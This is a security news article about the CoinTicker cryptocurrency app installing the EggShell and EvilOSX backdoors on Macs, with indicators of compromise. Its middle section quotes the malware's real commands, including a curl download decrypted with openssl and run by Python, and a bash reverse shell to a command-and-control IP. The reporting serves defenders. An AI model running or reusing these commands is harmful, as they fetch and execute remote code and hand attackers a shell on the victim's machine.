Wednesday, May 7, 2025
HomeBackdoorWidely Used Cryptocurrency App Launching 2 Different Powerful Backdoor on Mac Users

Widely Used Cryptocurrency App Launching 2 Different Powerful Backdoor on Mac Users

Published on

SIEM as a Service

Follow Us on Google News

A cryptocurrency app, CoinTicker which is widely used in cryptocurrency industry pushing 2 different backdoors on Mac users to steal the cryptocurrency coins and other malicious activities.

CoinTicker app actually appears as a legitimate application that helps to peoples who is willing to enter into cryptocurrency industries and make an investment.

This is working in a way to displays the menu bar along with the different cryptocurrencies price along with the ICON.

- Advertisement - Google News

CoinTicker App will also display the various cryptocurrencies price list , market, countries details where people can choose the different coin and name to know the current status of bitcoins.

One of the Malwarebyte’s forum member named 1vladimir experienced an unwanted behavior in this app and it performing various malicious activities in the backdoor of the Mac users.

Researchers believe that it could have been a supply chain attack, in which a legitimate app’s website is hacked to distribute a malicious version of the app.

Backdoor Installation and activities

Initially, once the App launched, it tried to download  2 different malicious components (EvilOSX and EggShell) installed into the user’s device and both backdoors referred as a open source.

Later it make an attempt to connect with command and control server  download a custom-compiled version of the EggShell server for macOS.

nohup curl -k -L -o /tmp/.info.enc https://github.com/youarenick/newProject/raw/
master/info.enc; openssl enc -aes-256-cbc -d -in /tmp/.info.enc -out /tmp/.info.py
 -k 111111qq; python /tmp/.info.py
According to Malwarebytes, The first part of the command downloads an encoded file from a Github page belonging to a user named “youarenick” and saves that file to a hidden file named .info.enc in /private/tmp/.
Next, it uses openssl to decode that file into a hidden Python file named .info.py. Finally, it executes the resulting Python script.

In this case, info.py perform various tasks and initially it using a command following command to connect with the C&C server.

nohup bash &> /dev/tcp/94.156.189.77/2280 0>&1

later it downloads the the EggShell mach-o binary, saving it to /tmp/espl:

curl -k -L -o /tmp/espl https://github.com/youarenick/newProject/raw/master/mac

Extracting the script reveals that it is the bot.py script from the EvilOSX backdoor made by Github user Marten4n6 and this script will communicate with a server at 185.206.144.226 on port 1339.

This both  EggShell and EvilOSX are broad-spectrum backdoors that can be used for a variety of purposes.

Also Read:

Beware !! #1 Adware Removal Mac Store App “Adware Doctor” Spying & Stealing Mac Users Sensitive Data

Dangerous macOS Backdoor That Steals User Login Credentials Remained Undetected for Years

MACOS Malware Targeting Cryptocurrency Users On Slack and Discord – 100% Undetected Virustotal

Indicators of Compromise

Files created:

/private/tmp/.info.enc
/private/tmp/.info.py
/private/tmp/.server.sh
/private/tmp/espl
~/Library/LaunchAgents/.espl.plist
~/Library/LaunchAgents/com.apple.[random string].plist
~/Library/Containers/.[random string]/[random string]

Network connections:

94.156.189.77:2280
185.206.144.226:1339

SHA-256:

CoinTicker.zip f4f45e16dd276b948dedd8a5f8d55c9e1e60884b9fe00143cb092eed693cddc4
espl efb5b32f87bfd6089912073cb33850c58640d59cb52d8c63853d97b4771bc490
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Mirai Botnet Actively Targeting GeoVision IoT Devices for Command Injection Exploits

The Akamai Security Intelligence and Response Team (SIRT) has identified active exploitation of command...

IBM Cognos Analytics Security Vulnerability Allowed Unauthorized File Uploads

 IBM has issued a security bulletin addressing two newly discovered, high-severity vulnerabilities in its...

Critical AWS Amplify Studio Flaw Allowed Attackers to Execute Arbitrary Code

Amazon Web Services (AWS) has addressed a critical security flaw (CVE-2025-4318) in its AWS Amplify...

Severe Kibana Flaw Allowed Attackers to Run Arbitrary Code

A newly disclosed security vulnerability in Elastic’s Kibana platform has put thousands of businesses...

Resilience at Scale

Why Application Security is Non-Negotiable

The resilience of your digital infrastructure directly impacts your ability to scale. And yet, application security remains a critical weak link for most organizations.

Application Security is no longer just a defensive play—it’s the cornerstone of cyber resilience and sustainable growth. In this webinar, Karthik Krishnamoorthy (CTO of Indusface) and Phani Deepak Akella (VP of Marketing – Indusface), will share how AI-powered application security can help organizations build resilience by

Discussion points


Protecting at internet scale using AI and behavioral-based DDoS & bot mitigation.
Autonomously discovering external assets and remediating vulnerabilities within 72 hours, enabling secure, confident scaling.
Ensuring 100% application availability through platforms architected for failure resilience.
Eliminating silos with real-time correlation between attack surface and active threats for rapid, accurate mitigation

More like this

BFDOOR Malware Targets Organizations to Establish Long-Term Persistence

The BPFDoor malware has emerged as a significant threat targeting domestic and international organizations,...

Over 2,800 Hacked Websites Targeting MacOS Users with AMOS Stealer Malware

Cybersecurity researcher has uncovered a massive malware campaign targeting MacOS users through approximately 2,800...

Hackers Target HR Departments With Fake Resumes to Spread More_eggs Malware

The financially motivated threat group Venom Spider, also tracked as TA4557, has shifted its...